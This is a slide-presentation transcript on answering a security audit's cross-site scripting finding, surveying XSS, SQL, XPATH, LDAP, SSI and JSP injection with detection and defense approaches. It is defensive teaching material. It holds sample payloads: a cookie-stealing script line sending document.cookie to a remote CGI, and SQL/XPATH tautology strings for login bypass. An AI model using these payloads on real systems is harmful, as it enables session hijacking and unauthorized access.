Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)
Financial Industry Security by Ron Widitz, MSIT ‘07.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Introduction to Web Application Security
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Workshop 3 Web Application Security Li Weichao March
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.
Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Cross-Site Attacks James Walden Northern Kentucky University.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Web Applications Testing By Jamie Rougvie Supported by.
Building Secure Web Applications With ASP.Net MVC.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Module: Software Engineering of Web Applications Chapter 3 (Cont.): user-input-validation testing of web applications 1.
What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Role Of Network IDS in Network Perimeter Defense.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Carrie Estes Collin Donaldson.  Zero day attacks  “zero day”  Web application attacks  Signing up for a class  Hardening the web server  Enhancing.
Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
Group 18: Chris Hood Brett Poche
Module: Software Engineering of Web Applications
Building Secure ColdFusion Applications
CSCE 548 Student Presentation Ryan Labrador
Web Security.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Chapter 7: Identifying Advanced Attacks
World Wide Web policy.
Database Driven Websites
Lecture 2 - SQL Injection
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Presentation transcript:

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz

Business Problem Independent security audit Independent security audit Regulatory compliance Regulatory compliance XSS issue raised XSS issue raised Must provide a response Must provide a response

Audit Response Either: Either: –Prove issue to be a non-problem or –Describe actions to take

Resolution Steps Investigate security concerns Investigate security concerns Restate as IT problem(s) Restate as IT problem(s) Determine solution(s) Determine solution(s) Provide audit response Provide audit response Mitigate risk Mitigate risk

Investigation Define cross-site scripting (XSS) Define cross-site scripting (XSS) Examine how auditors applied Examine how auditors applied Identify risks Identify risks Research preliminary solutions Research preliminary solutions

cross-site scripting Attacker goal: their code into browser Attacker goal: their code into browser XSS forces a website to execute malicious code in browser XSS forces a website to execute malicious code in browser Browser user is the intended victim Browser user is the intended victim Why? Account hijacking, keystroke recording, intranet hacking, theft… Why? Account hijacking, keystroke recording, intranet hacking, theft…

XSS concept

Auditor finding Freeform edit box Freeform edit box Message to Customer Service Message to Customer Service

XSS types Immediate reflection : phishing Immediate reflection : phishing DOM-based : 95 JavaScript methods DOM-based : 95 JavaScript methods Redirection : header, meta, dynamic Redirection : header, meta, dynamic Multimedia : Flash, QT, PDF scripts Multimedia : Flash, QT, PDF scripts Cross-Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) others… others… –(e.g. non-persistent search box)

Risks XSS abuses render engines or plug-ins XSS abuses render engines or plug-ins Steal browser cookies Steal browser cookies Steal session info for replay attack Steal session info for replay attack Malware or bot installation Malware or bot installation Redirect or phishing attempt Redirect or phishing attempt

Our actual risk Currently, none. Currently, none. Edit box info viewed in thick client Edit box info viewed in thick client DHTML or JavaScript needs browser DHTML or JavaScript needs browser Our thick client is Java Swing-based Our thick client is Java Swing-based

Planned Audit Response Could indicate “no audit problem” Could indicate “no audit problem” Might have future impact Might have future impact Address through dev standards Address through dev standards Consider application firewall Consider application firewall Widen problem scope to include all user agent injection tactics Widen problem scope to include all user agent injection tactics

More on Web Attacks Cross Site Scripting Cross Site Scripting SQL Injection SQL Injection XPATH Injection XPATH Injection LDAP Injection LDAP Injection SSI (server side inclusion) Injection SSI (server side inclusion) Injection JSP (Java server pages) Injection JSP (Java server pages) Injection

Artifacts For each injection issue: For each injection issue: –Vulnerability description documented –Preventative coding technique Discuss with App Dev teams Discuss with App Dev teams –Publish and socialize direction –Include in peer reviews/code walkthroughs –Set deadlines for full incorporation Communicate with auditors Communicate with auditors

Cross Site Scripting Example 1 Trudy posts the following JavaScript on a message board: Trudy posts the following JavaScript on a message board: document.location=' bin/ stealcookie.cgi?'+document.cookie document.location=' bin/ stealcookie.cgi?'+document.cookie When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Cross Site Scripting Example 2 Trudy sends a link to the following URL to Bob that will take him to a personalized page: Trudy sends a link to the following URL to Bob that will take him to a personalized page: document.location=' bin/stealcookie.cgi?'+document.cookie document.location=' bin/stealcookie.cgi?'+document.cookie A page is returned that contains the malicious script instead of the username Bob, and Bob’s browser executes the script causing his session cookie to be sent to Trudy A page is returned that contains the malicious script instead of the username Bob, and Bob’s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

Cross Site Scripting Detection A client usually is not supposed to send scripts to servers A client usually is not supposed to send scripts to servers –If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred A sanitized script could look like &ls;SCRIPT>… A sanitized script could look like &ls;SCRIPT>…

SQL Injection Example Trudy accesses Bob’s website; in which he does not validate input on his sign in form Trudy accesses Bob’s website; in which he does not validate input on his sign in form –Runs a SQL statement like the following: –SELECT * from Accounts where username = “USER_NAME” and password = “USER_PASS”; In the password field, she types as her password: In the password field, she types as her password: –X” OR “x”=“x Manipulates the server into running the following SQL command: Manipulates the server into running the following SQL command: –SELECT * from Accounts where username = “USER_NAME” and password=“X” OR “x”=“x”; –Selects all account information

SQL Injection Detection To detect and prevent this at Bob’s location To detect and prevent this at Bob’s location –Log any traffic from Trudy to Bob containing form data containing a quotation mark –Match any outgoing SQL statements from Bob’s web server to his database server and verify that the quotation marks Trudy supplied were escaped –If they weren’t, take action

XPATH Injection Example Similar to SQL injection Similar to SQL injection Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: –string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text()) Trudy again can provide the following password to change the statement’s logic: Trudy again can provide the following password to change the statement’s logic: –X’ OR ‘x’=‘x –The statement thus selects the first account

LDAP Injection Example Server using LDAP for authentication Server using LDAP for authentication –User name initialized, but then uses unchecked user input to create a query filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry Attacker can exploit using special characters Attacker can exploit using special charactershttp://example/ldapsearch.asp?user=*

LDAP Injection Detection Detection is based off of usage of special LDAP characters Detection is based off of usage of special LDAP characters –System monitors input for special characters –Either scrubs incoming input or watches for unescaped output passed to database server Detection approach is blackbox Detection approach is blackbox

SSI Injection Example Bob has his server configured to use Server- Side Includes Bob has his server configured to use Server- Side Includes Trudy passes input with an SSI embedded Trudy passes input with an SSI embedded SSI inserts malicious code into normal webpages upon next request SSI inserts malicious code into normal webpages upon next request Future legitimate users get content containing the tainted code included by the SSI Future legitimate users get content containing the tainted code included by the SSI

SSI Injection Detection Bob’s system needs SSI enabled, so he uses our system on local servers Bob’s system needs SSI enabled, so he uses our system on local servers –SSI code can be detected by its specific format HTML comment ( ) containing a command HTML comment ( ) containing a command –SSI commands can be stripped on ingress –Can also deny outgoing packets that do not include SSI as inputted (means successful execution) Detection approach is blackbox Detection approach is blackbox

JSP Injection Example Similar to SSI injection Similar to SSI injection Bob has a portal server configured to use dynamic code for templates Bob has a portal server configured to use dynamic code for templates Trudy passes input with an embedded Trudy passes input with an embedded malicious code inserted into webpage malicious code inserted into webpage

JSP Injection Prevention Prefer static include Prefer static include Don’t allow file inclusion outside of server via Java2 Security policies Don’t allow file inclusion outside of server via Java2 Security policies Firewall rules to prevent outbound requests from server Firewall rules to prevent outbound requests from server Input validation coding Input validation coding Choose portal software not requiring dynamic includes or code execution Choose portal software not requiring dynamic includes or code execution

Defense Approaches Web firewall/IDS Web firewall/IDS –ModSecurity for Apache –Commercial: SecureSphere from Impervia Static code analysis Static code analysis –Open source: Nikto –Commercial: Acutenix Web Vulnerability Scanner Acutenix Web Vulnerability Scanner N-stalker N-stalker Education on good coding Education on good coding –HTML encoding on input (server-side) –Input validation/filtering

Q&A Suggestions? Suggestions?

Backup Slides

user agent injection Stored Stored HTTP Response Splitting HTTP Response Splitting SQL Injection SQL Injection XML Injection XML Injection JSP Code Injection JSP Code Injection LDAP Injection LDAP Injection

Approaches Application firewall Application firewall HTML encoding on input (server-side) HTML encoding on input (server-side) Input validation/filtering Input validation/filtering Coding techniques with output Coding techniques with output Session key enforced to prevent CSRF Session key enforced to prevent CSRF

XPATH Injection Detection Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Detection approach is blackbox Detection approach is blackbox

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.